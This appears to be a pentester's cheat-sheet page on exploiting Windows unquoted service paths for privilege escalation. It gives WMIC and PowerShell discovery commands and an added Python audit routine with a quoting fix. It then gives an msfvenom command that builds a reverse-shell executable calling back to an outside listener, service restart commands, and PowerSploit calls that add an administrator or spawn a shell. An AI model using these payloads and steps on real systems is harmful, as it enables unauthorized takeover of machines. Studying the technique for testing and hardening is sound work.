Hack$Notes
Unquoted Service Path

Search for Unquoted Path

The following commands search for all auto-start service paths except those under "C:\Windows", since a standard user cannot write to that folder and it is therefore not useful for this technique.
## Windows Management Instrumentation Command-Line (WMIC) ##
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
## WMI (Powershell) ##
Get-WmiObject win32_service | select Name,PathName,StartMode,StartName | where {$_.StartMode -ne "Disabled" -and $_.StartName -eq "LocalSystem" -and $_.PathName -notmatch "`"" -and $_.PathName -notmatch "C:\\Windows"} | Format-List
If a service with an unquoted path is found, check the permissions of the folders along that path with icacls. If we have write permissions on any of the folders leading to the executable, we can escalate our privileges by placing a binary there that the service control manager will pick up before the real one.
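As an added illustration (not part of the original notes), the Python below computes the exact paths the service control manager would try before the real binary, and therefore which folders the icacls check must cover; it also generalises the check to quoted paths, paths without spaces and paths with arguments. The service names and ImagePath values are constructed samples.

```python
import ntpath
import re

# Constructed sample ImagePath values of the kind found under
# HKLM\SYSTEM\CurrentControlSet\Services\<name>\ImagePath (not real services).
SAMPLE_IMAGE_PATHS = {
    "GoodQuoted":   '"C:\\Program Files\\Vendor App\\svc.exe" -run',
    "GoodNoSpaces": r"C:\Tools\agent.exe",
    "BadUnquoted":  r"C:\Program Files\Vendor App\svc.exe -run",
    "SystemDir":    r"C:\Windows\system32\svchost.exe -k netsvcs",
}

def _exe_part(image_path: str) -> str:
    """Return the executable portion of the command line (arguments dropped).
    Assumes the binary ends in .exe; if no .exe is present the whole line is used."""
    p = image_path.strip()
    exe_end = p.lower().find(".exe")
    return p if exe_end == -1 else p[:exe_end + 4]

def is_unquoted_with_spaces(image_path: str) -> bool:
    """The precondition for the misconfiguration: path not quoted and containing a space."""
    p = image_path.strip()
    if p.startswith('"'):
        return False
    return " " in _exe_part(p)

def lookup_candidates(image_path: str) -> list:
    """Paths tried, in order, before the real binary: CreateProcess splits an
    unquoted command line at each space and appends .exe to a token without extension."""
    exe_part = _exe_part(image_path)
    candidates = []
    for m in re.finditer(" ", exe_part):
        prefix = exe_part[:m.start()]
        if not ntpath.splitext(prefix)[1]:
            prefix += ".exe"
        candidates.append(prefix)
    return candidates

def directories_to_check(image_path: str) -> list:
    """Folders whose ACLs must deny write access to ordinary users."""
    return sorted({ntpath.dirname(c) for c in lookup_candidates(image_path)})

def audit(services: dict) -> dict:
    """Map each misconfigured service name to the folders that need an ACL review."""
    return {name: directories_to_check(path)
            for name, path in services.items() if is_unquoted_with_spaces(path)}
```

The fix for a flagged service is to quote the binary path, for example `sc config <name> binPath= "\"C:\Program Files\Vendor App\svc.exe\" -run"`, and to confirm with icacls that the listed folders are not writable by standard users.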

Create an executable msfvenom payload

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.20 LPORT=443 -f exe > /root/same_service_name_as_above.exe

Replace the binary and restart the service.

sc stop service_name
sc start service_name

PowerSploit

Within PowerShell, run the following.
# Find them
Get-ServiceUnquoted
# Execute a reverse shell or add a new user as administrator.
Write-ServiceBinary -name "Service_Name" -Path "C:\Service_name.exe"